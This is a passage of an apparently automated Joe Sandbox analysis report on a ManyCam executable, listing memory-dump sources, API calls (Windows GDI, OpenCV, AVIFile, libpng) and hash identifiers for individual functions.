                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseCreateFileHandle
                                                                                                                                            • String ID: %s: Cannot open$TIFFOpen
                                                                                                                                            • API String ID: 3498533004-4026200435
                                                                                                                                            • Opcode ID: 9fa7475f1f8c408cb180f9576db3e9d2d0aa7ccdc6de5f5b94b2e46478c5df03
                                                                                                                                            • Instruction ID: 75ce6e9b07683cdfbba1876e67e6f17c8176b9183a54916414889030f92f0e68
                                                                                                                                            • Opcode Fuzzy Hash: 9fa7475f1f8c408cb180f9576db3e9d2d0aa7ccdc6de5f5b94b2e46478c5df03
                                                                                                                                            • Instruction Fuzzy Hash: 0F1125B67801002BE7242138AD9AF7B0ACAC3E1322F2455BFFA1AD72D2E6688C455161
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 004B77A0: fwprintf.MSVCR80 ref: 004B7842
                                                                                                                                              • Part of subcall function 004B77A0: fflush.MSVCR80 ref: 004B7852
                                                                                                                                            • clock.MSVCR80 ref: 00438AA7
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 00438AC5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocatorDebugHeapclockfflushfwprintf
                                                                                                                                            • String ID: >>> Entering: %s$ob@
                                                                                                                                            • API String ID: 1338021872-1849792878
                                                                                                                                            • Opcode ID: 096be4365fe6ecaff6f57c3d342fa79fd521a6c5a1afd4c32245b02c1f24962e
                                                                                                                                            • Instruction ID: e5c4b020fe9bb3bd421ac8dd4bd2dede87d7f0cb66a8b34f549f2a89e30843bb
                                                                                                                                            • Opcode Fuzzy Hash: 096be4365fe6ecaff6f57c3d342fa79fd521a6c5a1afd4c32245b02c1f24962e
                                                                                                                                            • Instruction Fuzzy Hash: 9D216075900209AFDB04EF94C942AEEBB74FF44718F10852DF816A73C1DB746A04CBA5
                                                                                                                                            APIs
                                                                                                                                            • cvError.CXCORE099(000000E5,cvGetTrackbarPos,NULL trackbar or window name,.\window_w32.cpp,0000057F), ref: 00B95E77
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Error
                                                                                                                                            • String ID: .\window_w32.cpp$NULL trackbar or window name$cvGetTrackbarPos
                                                                                                                                            • API String ID: 2619118453-2331188912
                                                                                                                                            • Opcode ID: 72b58fcac94dba6a742596d0f2b648c30bb499d182e0f4529f793c5707c65d08
                                                                                                                                            • Instruction ID: ac55a2b866f9bc443379176e952838765a4a33b21ee8f5653bd29c69528a4ae3
                                                                                                                                            • Opcode Fuzzy Hash: 72b58fcac94dba6a742596d0f2b648c30bb499d182e0f4529f793c5707c65d08
                                                                                                                                            • Instruction Fuzzy Hash: 79E02B72785E20175D32791D5C4295BA3C8CEC0BB1F1902F6BD28A72E2E311DD0143A5
                                                                                                                                            APIs
                                                                                                                                            • cvError.CXCORE099(000000E5,cvGetWindowHandle,NULL window name,.\window_w32.cpp,000005B9), ref: 00B95F32
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Error
                                                                                                                                            • String ID: .\window_w32.cpp$NULL window name$cvGetWindowHandle
                                                                                                                                            • API String ID: 2619118453-2248605415
                                                                                                                                            • Opcode ID: a0fc84040701904f43b4eb27a6bbb595c090ec4a2d6525ea1e0da679a0a4ceed
                                                                                                                                            • Instruction ID: 2b29df174fbe20589f3e44f2b7d6b58af9ed28c0cf5fc3c3cceaa8ad89c50e88
                                                                                                                                            • Opcode Fuzzy Hash: a0fc84040701904f43b4eb27a6bbb595c090ec4a2d6525ea1e0da679a0a4ceed
                                                                                                                                            • Instruction Fuzzy Hash: 84E0C2377C82212B9F11650E7C02EDB23C4CBD0BB1B0601F6FA49E72D6E260D80202F4
                                                                                                                                            APIs
                                                                                                                                            • cvError.CXCORE099(000000E5,cvSetMouseCallback,NULL window name,.\window_w32.cpp,00000566), ref: 00B95DFF
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Error
                                                                                                                                            • String ID: .\window_w32.cpp$NULL window name$cvSetMouseCallback
                                                                                                                                            • API String ID: 2619118453-1583835266
                                                                                                                                            • Opcode ID: d048767335b26e22f9f0dcfe9a753bf023ebdc686729dd30eb544e674a04c860
                                                                                                                                            • Instruction ID: d38c94edc509e5fe4b630db5f150642e254ab441e946c1d9015146509b7754c8
                                                                                                                                            • Opcode Fuzzy Hash: d048767335b26e22f9f0dcfe9a753bf023ebdc686729dd30eb544e674a04c860
                                                                                                                                            • Instruction Fuzzy Hash: 1AE086B1A8C7316F8F209F15BC41E5773D09B84760F0646EAF859673E5E270DD408AE9
                                                                                                                                            APIs
                                                                                                                                            • cvError.CXCORE099(000000E5,cvGetWindowName,NULL window,.\window_w32.cpp,000005D0), ref: 00B95F74
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Error
                                                                                                                                            • String ID: .\window_w32.cpp$NULL window$cvGetWindowName
                                                                                                                                            • API String ID: 2619118453-2260663865
                                                                                                                                            • Opcode ID: 308c5ad3d087a95af16c6c6302e071c55e8ccf33de389318d4eda3db4e0bb752
                                                                                                                                            • Instruction ID: 2657d0170c1c349fcc6fa6b5d5a3f9ae7d4aa953fce7460fbbe5b3d9d68dc49d
                                                                                                                                            • Opcode Fuzzy Hash: 308c5ad3d087a95af16c6c6302e071c55e8ccf33de389318d4eda3db4e0bb752
                                                                                                                                            • Instruction Fuzzy Hash: FED05B717882513A5E10661D7C02FD656CCCB44F71F4605F6F549E63F2F650EC00469D
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • png_do_dither returned rowbytes=0, xrefs: 00BB4B11
                                                                                                                                            • NULL row buffer for row %ld, pass %d, xrefs: 00BB48B6
                                                                                                                                            • png_do_rgb_to_gray found nongray pixel, xrefs: 00BB49A7, 00BB49BE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sprintf
                                                                                                                                            • String ID: NULL row buffer for row %ld, pass %d$png_do_dither returned rowbytes=0$png_do_rgb_to_gray found nongray pixel
                                                                                                                                            • API String ID: 590974362-2735929073
                                                                                                                                            • Opcode ID: fc4858867437b85e1b3b4d14673a4cc97ed7bf3532f4049da0ba6a59cb1c2a6e
                                                                                                                                            • Instruction ID: c155a1adaf940811f3365b0854e8fe5714f6b3876c794b8f12b962f42b3aaeee
                                                                                                                                            • Opcode Fuzzy Hash: fc4858867437b85e1b3b4d14673a4cc97ed7bf3532f4049da0ba6a59cb1c2a6e
                                                                                                                                            • Instruction Fuzzy Hash: 3AD13B75500B409BE72ADA34C885BF7B7E8FF55308F04894CE9EB42252EBB1B946C760
                                                                                                                                            APIs
                                                                                                                                            • GetFocus.USER32 ref: 004186F4
                                                                                                                                              • Part of subcall function 00408360: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004083C6
                                                                                                                                              • Part of subcall function 00408360: CompareStringW.KERNEL32(00000400,00000001,?,00000003,<A>,00000003), ref: 00408424
                                                                                                                                              • Part of subcall function 00408360: CompareStringW.KERNEL32(00000400,00000001,?,00000004,</A>,00000004), ref: 00408474
                                                                                                                                              • Part of subcall function 004078E0: GetClientRect.USER32(?,00000000), ref: 004078F1
                                                                                                                                              • Part of subcall function 00418A60: SetBkMode.GDI32(?,00000001), ref: 00418A71
                                                                                                                                              • Part of subcall function 00418A40: SelectObject.GDI32(?,?), ref: 00418A51
                                                                                                                                            • GetSysColor.USER32(00000011), ref: 004184AA
                                                                                                                                              • Part of subcall function 00418810: DeleteDC.GDI32(00000000), ref: 00418824
                                                                                                                                            • GetFocus.USER32 ref: 0041858A
                                                                                                                                              • Part of subcall function 00418AF0: DrawTextW.USER32(00000000,?,00000000,?,000000FF), ref: 00418B0D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CompareFocusString$ClientColorDeleteDrawModeObjectRectSelectTextlstrlen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1926319676-0
                                                                                                                                            • Opcode ID: 26e55d2ddd3d839f70efe0ddea58adb9d72dd7b4482a26fa95ec74e06393aeaf
                                                                                                                                            • Instruction ID: 8fd3581a3690b51667abaed722c69e7692ca1fee28cda492897b23429118541a
                                                                                                                                            • Opcode Fuzzy Hash: 26e55d2ddd3d839f70efe0ddea58adb9d72dd7b4482a26fa95ec74e06393aeaf
                                                                                                                                            • Instruction Fuzzy Hash: DCD1FA719002089FDB08DF95C891AEEBBB5FF48344F14811EE5166B392DF39A985CF94
                                                                                                                                            APIs
                                                                                                                                            • cvGetImageROI.CXCORE099(?,?), ref: 00B926C7
                                                                                                                                            • SetStretchBltMode.GDI32(?,00000003), ref: 00B9275A
                                                                                                                                            • ?Bpp@CvvImage@@QAEHXZ.HIGHGUI099(?), ref: 00B92769
                                                                                                                                            • StretchDIBits.GDI32(?,?,?,?,?,?,?,?,?,00000000,?,00000000,00CC0020), ref: 00B927BA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Stretch$BitsBpp@ImageImage@@Mode
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 903276727-0
                                                                                                                                            • Opcode ID: eaed336cc03e6299236130fb3d09c1137e5752df490cb6fef800b920e2ec2e57
                                                                                                                                            • Instruction ID: d33e4b584b8a5fcd6e8124d373eaa555f33c95320f3ebaca0963d1eb6e5ccf4a
                                                                                                                                            • Opcode Fuzzy Hash: eaed336cc03e6299236130fb3d09c1137e5752df490cb6fef800b920e2ec2e57
                                                                                                                                            • Instruction Fuzzy Hash: ED41F1B5608200AFC714DF58C880D2BB7E9EB88714F158A6DF69997361D730ED05CBA6
                                                                                                                                            APIs
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 005128FB
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 0051292B
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 00512953
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 0051297B
                                                                                                                                              • Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB139
                                                                                                                                              • Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB155
                                                                                                                                              • Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB171
                                                                                                                                              • Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB1A3
                                                                                                                                              • Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB1D6
                                                                                                                                              • Part of subcall function 0050E580: wcscpy.MSVCR80 ref: 0050E5EC
                                                                                                                                              • Part of subcall function 0050E580: wcscpy.MSVCR80 ref: 0050E623
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocatorDebugHeap$wcscpy
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 147117728-0
                                                                                                                                            • Opcode ID: d0bbc9be73f287d5b3265cda2ea85270813d23556e8a0590b6fb4fd8d4f8cf1c
                                                                                                                                            • Instruction ID: 4db675f979ab1b4fcf933bf1fc0f7ec6c4e65dab18244cadebc46eb2865c177d
                                                                                                                                            • Opcode Fuzzy Hash: d0bbc9be73f287d5b3265cda2ea85270813d23556e8a0590b6fb4fd8d4f8cf1c
                                                                                                                                            • Instruction Fuzzy Hash: FF512AB0906259DFEB14DF58D899BAEBBB5BF48304F1042EDE409A7281C7385E44CF95
                                                                                                                                            APIs
                                                                                                                                            • cvLoadImage.HIGHGUI099(?,?), ref: 00B9218D
                                                                                                                                            • cvSetImageROI.CXCORE099(00000000), ref: 00B9221E
                                                                                                                                            • cvReleaseImage.CXCORE099(?), ref: 00B92240
                                                                                                                                            • cvReleaseImage.CXCORE099(?), ref: 00B92259
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Image$Release$Load
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1413804649-0
                                                                                                                                            • Opcode ID: a4d4840bee8ad4b3121e05d0b855a454b0eeaed213024734cef0bc68e88dd3e0
                                                                                                                                            • Instruction ID: 07eba4bbf48a00cfa4cfb7fa23020f4433ee28f934a4894164a0a1a2a2c118fc
                                                                                                                                            • Opcode Fuzzy Hash: a4d4840bee8ad4b3121e05d0b855a454b0eeaed213024734cef0bc68e88dd3e0
                                                                                                                                            • Instruction Fuzzy Hash: 6531EF76A04311AB8B08EF18C98082BB3E6EFC8714F1585BDE80997301DB31ED0ECB91
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00B91230: AVIFileInit.AVIFIL32(00B91F21), ref: 00B91239
                                                                                                                                            • AVIFileOpenA.AVIFIL32(?,?,00000000,00000000), ref: 00B912E1
                                                                                                                                            • AVIFileGetStream.AVIFIL32(?,?,73646976,00000000,?,?,00000000,00000000), ref: 00B912FC
                                                                                                                                            • AVIStreamInfoA.AVIFIL32(00000000,?,0000008C,?,?,73646976,00000000,?,?,00000000,00000000), ref: 00B91316
                                                                                                                                            • AVIStreamGetFrameOpen.AVIFIL32(?,?,00000000), ref: 00B913A5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileStream$Open$FrameInfoInit
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3655022341-0
                                                                                                                                            • Opcode ID: 30141c959b5a1cb2d77192d91f08592d99ce14860183f2cedb1a24cc689c9298
                                                                                                                                            • Instruction ID: c9c15c4f9f2709c36d756f59401894132b5ba95cc6128a274423aa9e852ccf27
                                                                                                                                            • Opcode Fuzzy Hash: 30141c959b5a1cb2d77192d91f08592d99ce14860183f2cedb1a24cc689c9298
                                                                                                                                            • Instruction Fuzzy Hash: 04319175600201ABDF04EF68CD81BA677E5EF48710F4485B9ED48CF34AEB35D9049BA5
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Iatan$Isqrt
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1025909456-0
                                                                                                                                            • Opcode ID: 57f5941b643651e987862c1e0d1d6f7d17b30a8860795f25dd51119af805d3df
                                                                                                                                            • Instruction ID: 369849f07fd1038270b353e5a516803fc2d99b3ba7736fd5bc0cfa9b85f71fc3
